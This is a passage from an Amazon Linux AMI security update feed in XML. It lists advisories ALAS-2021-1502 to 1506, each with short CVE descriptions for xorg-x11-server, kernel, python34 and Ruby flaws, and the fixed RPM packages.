version="2.4.10" release="2.14.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby24-irb-2.4.10-2.14.amzn1.noarch.rpm</filename></package><package name="rubygem24-test-unit" version="3.2.3" release="2.14.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-test-unit-3.2.3-2.14.amzn1.noarch.rpm</filename></package><package name="ruby24-devel" version="2.4.10" release="2.14.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/ruby24-devel-2.4.10-2.14.amzn1.x86_64.rpm</filename></package><package name="ruby24" version="2.4.10" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-2.4.10-2.14.amzn1.x86_64.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.2" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-bigdecimal-1.3.2-2.14.amzn1.x86_64.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.10" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-debuginfo-2.4.10-2.14.amzn1.x86_64.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-json-2.0.4-2.14.amzn1.x86_64.rpm</filename></package><package name="rubygem24-minitest5" version="5.10.1" release="2.14.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-minitest5-5.10.1-2.14.amzn1.noarch.rpm</filename></package><package name="rubygem24-rdoc" version="5.0.1" release="2.14.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-rdoc-5.0.1-2.14.amzn1.noarch.rpm</filename></package><package name="ruby24-libs" version="2.4.10" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-libs-2.4.10-2.14.amzn1.x86_64.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-xmlrpc-0.2.1-2.14.amzn1.x86_64.rpm</filename></package><package name="rubygem24-net-telnet" version="0.1.1" release="2.14.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-net-telnet-0.1.1-2.14.amzn1.x86_64.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-json-2.0.4-2.14.amzn1.i686.rpm</filename></package><package name="ruby24" version="2.4.10" release="2.14.amzn1" epoch="0" 
arch="i686"><filename>Packages/ruby24-2.4.10-2.14.amzn1.i686.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.2" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-bigdecimal-1.3.2-2.14.amzn1.i686.rpm</filename></package><package name="ruby24-devel" version="2.4.10" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-devel-2.4.10-2.14.amzn1.i686.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.10" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-debuginfo-2.4.10-2.14.amzn1.i686.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-xmlrpc-0.2.1-2.14.amzn1.i686.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-psych-2.2.2-2.14.amzn1.i686.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-io-console-0.4.6-2.14.amzn1.i686.rpm</filename></package><package name="ruby24-libs" version="2.4.10" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-libs-2.4.10-2.14.amzn1.i686.rpm</filename></package><package name="rubygem24-net-telnet" version="0.1.1" release="2.14.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem24-net-telnet-0.1.1-2.14.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1502</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1502: important priority package update for xorg-x11-server</title><issued date="2021-05-14 17:00:00" /><updated date="2021-05-19 17:36:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-3472:
A flaw was found in xorg-x11-server. An integer underflow can occur in xserver which can lead to a local privilege escalation. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
1944167: CVE-2021-3472 xorg-x11-server: XChangeFeedbackControl integer underflow leads to privilege escalation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3472" title="" id="CVE-2021-3472" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.44.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.44.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.44.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.44.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xdmx" version="1.17.4" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.44.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-source" version="1.17.4" release="18.44.amzn1" epoch="0" arch="noarch"><filename>Packages/xorg-x11-server-source-1.17.4-18.44.amzn1.noarch.rpm</filename></package><package name="xorg-x11-server-devel" version="1.17.4" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-devel-1.17.4-18.44.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.44.amzn1.x86_64.rpm</filename></package><package name="xorg-x11-server-common" version="1.17.4" release="18.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/xorg-x11-server-common-1.17.4-18.44.amzn1.x86_64.rpm</filename></package><package 
name="xorg-x11-server-Xdmx" version="1.17.4" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xdmx-1.17.4-18.44.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xorg" version="1.17.4" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xorg-1.17.4-18.44.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xephyr" version="1.17.4" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xephyr-1.17.4-18.44.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xnest" version="1.17.4" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xnest-1.17.4-18.44.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-devel" version="1.17.4" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-devel-1.17.4-18.44.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-debuginfo" version="1.17.4" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-debuginfo-1.17.4-18.44.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-common" version="1.17.4" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-common-1.17.4-18.44.amzn1.i686.rpm</filename></package><package name="xorg-x11-server-Xvfb" version="1.17.4" release="18.44.amzn1" epoch="0" arch="i686"><filename>Packages/xorg-x11-server-Xvfb-1.17.4-18.44.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1503</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1503: low priority package update for kernel</title><issued date="2021-05-20 21:12:00" /><updated date="2021-05-21 18:49:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-33033:
The Linux kernel before 5.11.14 has a use-after-free in cipso_v4_genopt in net/ipv4/cipso_ipv4.c because the CIPSO and CALIPSO refcounting for the DOI definitions is mishandled, aka CID-ad5d07f4a9cd. This leads to writing an arbitrary value.
CVE-2021-31916:
An out-of-bounds (OOB) memory write flaw was found in list_devices in drivers/md/dm-ioctl.c in the Multi-device driver module in the Linux kernel. A bound check failure allows an attacker with special user (CAP_SYS_ADMIN) privilege to gain access to out-of-bounds memory leading to a system crash or a leak of internal kernel information. The highest threat from this vulnerability is to system availability.
1946965: CVE-2021-31916 kernel: out of bounds array access in drivers/md/dm-ioctl.c
CVE-2021-31829:
A flaw was found in the Linux kernel's eBPF verification code. By default, the eBPF verifier is only accessible to privileged users with CAP_SYS_ADMIN. This flaw allows a local user who can insert eBPF instructions to use the eBPF verifier to abuse a spectre-like flaw and infer all system memory. The highest threat from this vulnerability is to confidentiality.
1957788: CVE-2021-31829 kernel: protection of stack pointer against speculative pointer arithmetic can be bypassed to leak content of kernel memory
CVE-2021-29155:
A vulnerability was discovered in retrieve_ptr_limit in kernel/bpf/verifier.c in the Linux kernel mechanism to mitigate speculatively out-of-bounds loads (Spectre mitigation). In this flaw a local, special user privileged (CAP_SYS_ADMIN) BPF program running on affected systems may bypass the protection, and execute speculatively out-of-bounds loads from the kernel memory. This can be abused to extract contents of kernel memory via side-channel.
1951595: CVE-2021-29155 kernel: protection for sequences of pointer arithmetic operations against speculatively out-of-bounds loads can be bypassed to leak content of kernel memory
CVE-2021-29154:
A flaw was found in the Linux kernel's eBPF implementation. By default, the eBPF verifier is only accessible to privileged users with CAP_SYS_ADMIN. A local user with the ability to insert eBPF instructions can abuse a flaw in eBPF to corrupt memory. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
1946684: CVE-2021-29154 kernel: Local privilege escalation due to incorrect BPF JIT branch displacement computation
CVE-2021-28971:
A flaw was found in the Linux kernel. On some Haswell CPUs, userspace applications (such as perf-fuzzer) can cause a system crash because the PEBS status in a PEBS record is mishandled.
1941784: CVE-2021-28971 kernel: System crash in intel_pmu_drain_pebs_nhm in arch/x86/events/intel/ds.c
CVE-2021-28964:
A race condition flaw was found in get_old_root in fs/btrfs/ctree.c in the Linux kernel in btrfs file-system. This flaw allows a local attacker with a special user privilege to cause a denial of service due to not locking an extent buffer before a cloning operation. The highest threat from this vulnerability is to system availability.
1941804: CVE-2021-28964 kernel: race condition in get_old_root function in fs/btrfs/ctree.c because of a lack of locking on an extent buffer before a cloning operation
CVE-2021-28688:
99999:
CVE-2021-23133:
A use-after-free flaw was found in the Linux kernel's SCTP socket functionality that triggers a race condition. This flaw allows a local user to escalate their privileges on the system. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.
1948772: CVE-2021-23133 kernel: Race condition in sctp_destroy_sock list_del
CVE-2020-29374:
An issue was discovered in the Linux kernel related to mm/gup.c and mm/huge_memory.c. The get_user_pages (aka gup) implementation, when used for a copy-on-write page, does not properly consider the semantics of read operations and therefore can grant unintended write access.
1903249: CVE-2020-29374 kernel: the get_user_pages implementation when used for a copy-on-write page does not properly consider the semantics of read operations and therefore can grant unintended write access
CVE-2020-25673:
1894558: CVE-2020-25673 kernel: non-blocking socket in llcp_sock_connect()
CVE-2020-25672:
No description is available for this CVE.
99999:
CVE-2020-25672 kernel: memory leak in llcp_sock_connect()
CVE-2020-25671:
No description is available for this CVE.
99999:
CVE-2020-25671 kernel: refcount leak in llcp_sock_connect()
CVE-2020-25670:
No description is available for this CVE.
99999:
CVE-2020-25670 kernel: refcount leak in llcp_sock_bind()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25670" title="" id="CVE-2020-25670" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25671" title="" id="CVE-2020-25671" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25672" title="" id="CVE-2020-25672" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-25673" title="" id="CVE-2020-25673" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-29374" title="" id="CVE-2020-29374" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23133" title="" id="CVE-2021-23133" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28688" title="" id="CVE-2021-28688" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28964" title="" id="CVE-2021-28964" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28971" title="" id="CVE-2021-28971" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29154" title="" id="CVE-2021-29154" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29155" title="" id="CVE-2021-29155" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31829" title="" id="CVE-2021-31829" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31916" title="" id="CVE-2021-31916" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33033" title="" id="CVE-2021-33033" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf-debuginfo" version="4.14.232" release="123.381.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/perf-debuginfo-4.14.232-123.381.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.232" release="123.381.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.232-123.381.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.232" release="123.381.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.232-123.381.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.232" release="123.381.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.232-123.381.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.232" release="123.381.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.232-123.381.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.232" release="123.381.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.232-123.381.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.232" release="123.381.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.232-123.381.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.232" release="123.381.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.232-123.381.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.232" release="123.381.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.232-123.381.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.232" release="123.381.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.232-123.381.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.232" release="123.381.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.232-123.381.amzn1.i686.rpm</filename></package><package 
name="kernel-tools-devel" version="4.14.232" release="123.381.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.232-123.381.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.232" release="123.381.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.232-123.381.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.232" release="123.381.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.232-123.381.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.232" release="123.381.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.232-123.381.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.232" release="123.381.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.232-123.381.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.232" release="123.381.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.232-123.381.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.232" release="123.381.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.232-123.381.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.232" release="123.381.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.232-123.381.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.232" release="123.381.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.232-123.381.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1504</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1504: low priority package update for python34</title><issued date="2021-05-20 21:12:00" /><updated date="2021-05-21 18:50:00" 
/><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-3426:
No description is available for this CVE.
1935913: CVE-2021-3426 python: information disclosure via pydoc
CVE-2021-23336:
The package python/cpython is vulnerable to Web Cache Poisoning via urllib.parse.parse_qsl and urllib.parse.parse_qs by using a vector called parameter cloaking. When the attacker can separate query parameters using a semicolon (;), they can cause a difference in the interpretation of the request between the proxy (running with default configuration) and the server. This can result in malicious requests being cached as completely safe ones, as the proxy would usually not see the semicolon as a separator, and therefore would not include it in a cache key of an unkeyed parameter.
1928904: CVE-2021-23336 python: Web cache poisoning via urllib.parse.parse_qsl and urllib.parse.parse_qs by using a semicolon in query parameters
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23336" title="" id="CVE-2021-23336" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3426" title="" id="CVE-2021-3426" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python34-debuginfo" version="3.4.10" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-debuginfo-3.4.10-1.55.amzn1.x86_64.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-tools-3.4.10-1.55.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-devel-3.4.10-1.55.amzn1.x86_64.rpm</filename></package><package name="python34" version="3.4.10" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-3.4.10-1.55.amzn1.x86_64.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-libs-3.4.10-1.55.amzn1.x86_64.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.55.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-test-3.4.10-1.55.amzn1.x86_64.rpm</filename></package><package name="python34-tools" version="3.4.10" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/python34-tools-3.4.10-1.55.amzn1.i686.rpm</filename></package><package name="python34-debuginfo" version="3.4.10" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/python34-debuginfo-3.4.10-1.55.amzn1.i686.rpm</filename></package><package name="python34-test" version="3.4.10" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/python34-test-3.4.10-1.55.amzn1.i686.rpm</filename></package><package name="python34-libs" version="3.4.10" release="1.55.amzn1" 
epoch="0" arch="i686"><filename>Packages/python34-libs-3.4.10-1.55.amzn1.i686.rpm</filename></package><package name="python34" version="3.4.10" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/python34-3.4.10-1.55.amzn1.i686.rpm</filename></package><package name="python34-devel" version="3.4.10" release="1.55.amzn1" epoch="0" arch="i686"><filename>Packages/python34-devel-3.4.10-1.55.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1505</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1505: low priority package update for ruby20</title><issued date="2021-05-20 21:12:00" /><updated date="2021-05-21 18:50:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-31799:
RDoc before version 6.3.1 used to call Kernel#open to open a local file. If a Ruby project has a file whose name starts with "|" and ends with "tags", the command following the pipe character is executed. A malicious Ruby project could exploit it to run an arbitrary command execution against a user who attempts to run the rdoc command.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31799" title="" id="CVE-2021-31799" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygems20-devel" version="2.0.14.1" release="2.40.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-devel-2.0.14.1-2.40.amzn1.noarch.rpm</filename></package><package name="rubygems20" version="2.0.14.1" release="2.40.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems20-2.0.14.1-2.40.amzn1.noarch.rpm</filename></package><package name="ruby20-libs" version="2.0.0.648" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-libs-2.0.0.648-2.40.amzn1.x86_64.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-psych-2.0.0-2.40.amzn1.x86_64.rpm</filename></package><package name="ruby20-irb" version="2.0.0.648" release="2.40.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-irb-2.0.0.648-2.40.amzn1.noarch.rpm</filename></package><package name="ruby20-doc" version="2.0.0.648" release="2.40.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby20-doc-2.0.0.648-2.40.amzn1.noarch.rpm</filename></package><package name="ruby20" version="2.0.0.648" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-2.0.0.648-2.40.amzn1.x86_64.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.648" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby20-debuginfo-2.0.0.648-2.40.amzn1.x86_64.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-io-console-0.4.2-2.40.amzn1.x86_64.rpm</filename></package><package name="ruby20-devel" version="2.0.0.648" release="2.40.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/ruby20-devel-2.0.0.648-2.40.amzn1.x86_64.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="2.40.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem20-bigdecimal-1.2.0-2.40.amzn1.x86_64.rpm</filename></package><package name="rubygem20-io-console" version="0.4.2" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-io-console-0.4.2-2.40.amzn1.i686.rpm</filename></package><package name="rubygem20-bigdecimal" version="1.2.0" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-bigdecimal-1.2.0-2.40.amzn1.i686.rpm</filename></package><package name="ruby20" version="2.0.0.648" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-2.0.0.648-2.40.amzn1.i686.rpm</filename></package><package name="rubygem20-psych" version="2.0.0" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem20-psych-2.0.0-2.40.amzn1.i686.rpm</filename></package><package name="ruby20-debuginfo" version="2.0.0.648" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-debuginfo-2.0.0.648-2.40.amzn1.i686.rpm</filename></package><package name="ruby20-libs" version="2.0.0.648" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-libs-2.0.0.648-2.40.amzn1.i686.rpm</filename></package><package name="ruby20-devel" version="2.0.0.648" release="2.40.amzn1" epoch="0" arch="i686"><filename>Packages/ruby20-devel-2.0.0.648-2.40.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2021-1506</id><title>Amazon Linux AMI 2014.03 - ALAS-2021-1506: low priority package update for ruby24</title><issued date="2021-05-20 21:12:00" /><updated date="2021-05-21 18:51:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-31799:
RDoc before version 6.3.1 used to call Kernel#open to open a local file. If a Ruby project has a file whose name starts with "|" and ends with "tags", the command following the pipe character is executed. A malicious Ruby project could exploit this to execute arbitrary commands against a user who attempts to run the rdoc command.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31799" title="" id="CVE-2021-31799" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby24-devel" version="2.4.10" release="2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-devel-2.4.10-2.15.amzn1.x86_64.rpm</filename></package><package name="rubygem24-rdoc" version="5.0.1" release="2.15.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-rdoc-5.0.1-2.15.amzn1.noarch.rpm</filename></package><package name="ruby24-debuginfo" version="2.4.10" release="2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-debuginfo-2.4.10-2.15.amzn1.x86_64.rpm</filename></package><package name="ruby24-irb" version="2.4.10" release="2.15.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby24-irb-2.4.10-2.15.amzn1.noarch.rpm</filename></package><package name="rubygem24-xmlrpc" version="0.2.1" release="2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-xmlrpc-0.2.1-2.15.amzn1.x86_64.rpm</filename></package><package name="rubygem24-power_assert" version="0.4.1" release="2.15.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-power_assert-0.4.1-2.15.amzn1.noarch.rpm</filename></package><package name="ruby24-libs" version="2.4.10" release="2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-libs-2.4.10-2.15.amzn1.x86_64.rpm</filename></package><package name="rubygems24" version="2.6.14.4" release="2.15.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-2.6.14.4-2.15.amzn1.noarch.rpm</filename></package><package name="rubygems24-devel" version="2.6.14.4" release="2.15.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems24-devel-2.6.14.4-2.15.amzn1.noarch.rpm</filename></package><package name="rubygem24-psych" version="2.2.2" release="2.15.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/rubygem24-psych-2.2.2-2.15.amzn1.x86_64.rpm</filename></package><package name="rubygem24-did_you_mean" version="1.1.0" release="2.15.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-did_you_mean-1.1.0-2.15.amzn1.noarch.rpm</filename></package><package name="ruby24" version="2.4.10" release="2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby24-2.4.10-2.15.amzn1.x86_64.rpm</filename></package><package name="rubygem24-json" version="2.0.4" release="2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-json-2.0.4-2.15.amzn1.x86_64.rpm</filename></package><package name="rubygem24-net-telnet" version="0.1.1" release="2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-net-telnet-0.1.1-2.15.amzn1.x86_64.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-io-console-0.4.6-2.15.amzn1.x86_64.rpm</filename></package><package name="rubygem24-minitest5" version="5.10.1" release="2.15.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-minitest5-5.10.1-2.15.amzn1.noarch.rpm</filename></package><package name="rubygem24-test-unit" version="3.2.3" release="2.15.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygem24-test-unit-3.2.3-2.15.amzn1.noarch.rpm</filename></package><package name="rubygem24-bigdecimal" version="1.3.2" release="2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem24-bigdecimal-1.3.2-2.15.amzn1.x86_64.rpm</filename></package><package name="ruby24-doc" version="2.4.10" release="2.15.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby24-doc-2.4.10-2.15.amzn1.noarch.rpm</filename></package><package name="ruby24-devel" version="2.4.10" release="2.15.amzn1" epoch="0" arch="i686"><filename>Packages/ruby24-devel-2.4.10-2.15.amzn1.i686.rpm</filename></package><package name="rubygem24-io-console" version="0.4.6" release="2.15.amzn1" epoch="0" 
